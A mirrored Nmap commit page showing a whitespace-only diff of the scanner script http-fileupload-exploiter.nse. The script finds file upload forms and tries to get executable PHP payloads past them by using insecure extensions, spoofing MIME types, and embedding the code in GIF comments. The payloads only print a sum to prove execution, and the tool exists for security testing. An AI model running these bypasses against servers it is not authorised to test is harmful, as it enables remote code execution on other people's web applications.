PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-06 04:31:29 +00:00
Code Issues Projects Releases Wiki Activity

Remove trailing whitespace in lua files

Browse Source 
Whitespace is not significant, so this should not be a problem.
https://secwiki.org/w/Nmap/Code_Standards
This commit is contained in:
dmiller
2014-01-23 21:51:58 +00:00
parent 86ac3c0a19
commit 620f9fdb34
499 changed files with 11134 additions and 11134 deletions
Download Patch File Download Diff File Expand all files Collapse all files

94
scripts/http-fileupload-exploiter.nse
View File

@@ -1,51 +1,51 @@
description = [[
Exploits insecure file upload forms in web applications
using various techniques like changing the Content-type
header or creating valid image files containing the
header or creating valid image files containing the
payload in the comment.
]]
---
-- @usage nmap -p80 --script http-fileupload-exploiter.nse <target>
--
--
-- This script discovers the upload form on the target's page and
-- attempts to exploit it using 3 different methods:
--
-- 1) At first, it tries to upload payloads with different insecure
-- extensions. This will work against a weak blacklist used by a file
-- 1) At first, it tries to upload payloads with different insecure
-- extensions. This will work against a weak blacklist used by a file
-- name extension verifier.
--
-- 2) If (1) doesn't work, it will try to upload the same payloads
-- this time with different Content-type headers, like "image/gif"
-- instead of the "text/plain". This will trick any mechanisms that
-- 2) If (1) doesn't work, it will try to upload the same payloads
-- this time with different Content-type headers, like "image/gif"
-- instead of the "text/plain". This will trick any mechanisms that
-- check the MIME type.
--
-- 3) If (2), doesn't work, it will create some proper GIF images
-- that contain the payloads in the comment. The interpreter will
-- 3) If (2), doesn't work, it will create some proper GIF images
-- that contain the payloads in the comment. The interpreter will
-- see the executable inside some binary garbage. This will bypass
-- any check of the actual content of the uploaded file.
--
-- TODO:
-- * Use the vulns library to report.
--
-- @args http-fileupload-exploiter.formpaths The pages that contain
-- @args http-fileupload-exploiter.formpaths The pages that contain
-- the forms to exploit. For example, {/upload.php, /login.php}.
-- Default: nil (crawler mode on)
-- @args http-fileupload-exploiter.uploadspaths Directories with
-- the uploaded files. For example, {/avatars, /photos}. Default:
-- @args http-fileupload-exploiter.uploadspaths Directories with
-- the uploaded files. For example, {/avatars, /photos}. Default:
-- {'/uploads', '/upload', '/file', '/files', '/downloads'}
-- @args http-fileupload-exploiter.fieldvalues The script will try to
-- @args http-fileupload-exploiter.fieldvalues The script will try to
-- fill every field found in the upload form but that may fail
-- due to fields' restrictions. You can manually fill those
-- fields using this table. For example, {gender = "male", email
-- due to fields' restrictions. You can manually fill those
-- fields using this table. For example, {gender = "male", email
-- = "foo@bar.com"}. Default: {}
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | Testing page /post.html
-- |
-- | Succesfully uploaded and executed payloads:
-- |
-- | Succesfully uploaded and executed payloads:
-- | Filename: 1.php, MIME: text/plain
-- |_ Filename: 1.php3, MIME: text/plain
---
@@ -65,15 +65,15 @@ local table = require "table"
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
-- A list of payloads. The interpreted code in the 'content' variable should
-- A list of payloads. The interpreted code in the 'content' variable should
-- output the result in the 'check' variable.
--
-- You can manually add / remove your own payloads but make sure you
-- don't mess up, otherwise the script may succeed when it actually
-- hasn't.
-- You can manually add / remove your own payloads but make sure you
-- don't mess up, otherwise the script may succeed when it actually
-- hasn't.
--
-- Note, that more payloads will slow down your scan significaly.
payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
{ filename = "1.php3", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
-- { filename = "1.php4", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
-- { filename = "1.shtml", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
@@ -87,7 +87,7 @@ payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", c
listofrequests = {}
-- Escape for jsp and asp payloads.
local escape = function(s)
local escape = function(s)
return (s:gsub('%%', '%%%%'))
end
@@ -110,9 +110,9 @@ local function UploadRequest(host, port, submission, partofrequest, name, filena
local options = { header={} }
options['header']['Content-Type'] = "multipart/form-data; boundary=AaB03x"
options['content'] = self.partofrequest .. '--AaB03x\nContent-Disposition: form-data; name="' .. self.name .. '"; filename="' .. self.filename .. '"\nContent-Type: ' .. self.mime .. '\n\n' .. self.payload .. '\n--AaB03x--'
stdnse.print_debug(2, "Making a request: Header: " .. options['header']['Content-Type'] .. "\nContent: " .. escape(options['content']))
local response = http.post(self.host, self.port, self.submission, options, { no_cache = true })
return response.body
@@ -121,7 +121,7 @@ local function UploadRequest(host, port, submission, partofrequest, name, filena
checkPayload = function(self, uploadspaths)
for _, uploadpath in ipairs(uploadspaths) do
local response = http.get(host, port, uploadpath .. '/' .. filename, { no_cache = true } )
if response.status ~= 404 then
if (response.body:match(self.check)) then
self.success = 1
@@ -140,7 +140,7 @@ local buildRequests = function(host, port, submission, name, mime, partofrequest
for i, p in ipairs(payloads) do
if image then
p['content'] = string.gsub(image, '!!comment!!', escape(p['content']), 1, true)
p['content'] = string.gsub(image, '!!comment!!', escape(p['content']), 1, true)
end
UploadRequest(host, port, submission, partofrequest, name, p['filename'], mime, p['content'], p['check'])
end
@@ -194,8 +194,8 @@ local prepareRequest = function(fields, fieldvalues)
end
return req, filefield
end
end
action = function(host, port)
@@ -203,10 +203,10 @@ action = function(host, port)
local uploadspaths = stdnse.get_script_args("http-fileupload-exploiter.uploadspaths") or {'/uploads', '/upload', '/file', '/files', '/downloads'}
local fieldvalues = stdnse.get_script_args("http-fileupload-exploiter.fieldvalues") or {}
local returntable = {}
local returntable = {}
local result
local foundform = 0
local foundform = 0
local foundfield = 0
local fail = 0
@@ -218,7 +218,7 @@ action = function(host, port)
end
crawler:set_timeout(10000)
local index, k, target, response
while (true) do
@@ -230,7 +230,7 @@ action = function(host, port)
end
response = http.get(host, port, target)
else
local status, r = crawler:crawl()
-- if the crawler fails it can be due to a number of different reasons
-- most of them are "legitimate" and should not be reason to abort
@@ -244,27 +244,27 @@ action = function(host, port)
target = tostring(r.url)
response = r.response
end
if response.body then
if response.body then
local forms = http.grab_forms(response.body)
for i, form in ipairs(forms) do
for i, form in ipairs(forms) do
form = http.parse_form(form)
if form then
local action_absolute = string.find(form["action"], "https*://")
-- Determine the path where the form needs to be submitted.
local submission
if action_absolute then
submission = form["action"]
else
else
local path_cropped = string.match(target, "(.*/).*")
path_cropped = path_cropped and path_cropped or ""
submission = path_cropped..form["action"]
@@ -277,7 +277,7 @@ action = function(host, port)
if filefield ~= 0 then
foundfield = 1
-- Method (1).
buildRequests(host, port, submission, filefield["name"], "text/plain", partofrequest, uploadspaths)
@@ -286,14 +286,14 @@ action = function(host, port)
table.insert(returntable, result)
break
end
-- Method (2).
buildRequests(host, port, submission, filefield["name"], "image/gif", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/png", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/jpeg", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/jpeg", partofrequest, uploadspaths)
result = makeAndCheckRequests(uploadspaths)
if result then
if result then
table.insert(returntable, result)
break
end
@@ -301,7 +301,7 @@ action = function(host, port)
-- Method (3).
local inp = assert(io.open("nselib/data/pixel.gif", "rb"))
local image = inp:read("*all")
buildRequests(host, port, submission, filefield["name"], "image/gif", partofrequest, uploadspaths, image)
result = makeAndCheckRequests(uploadspaths)
@@ -310,8 +310,8 @@ action = function(host, port)
else
fail = 1
end
end
else
end
else
table.insert(returntable, {"Couldn't find a file-type field."})
end
end
@@ -321,7 +321,7 @@ action = function(host, port)
end
if (index) then
index = index + 1
else
else
index = 1
end
end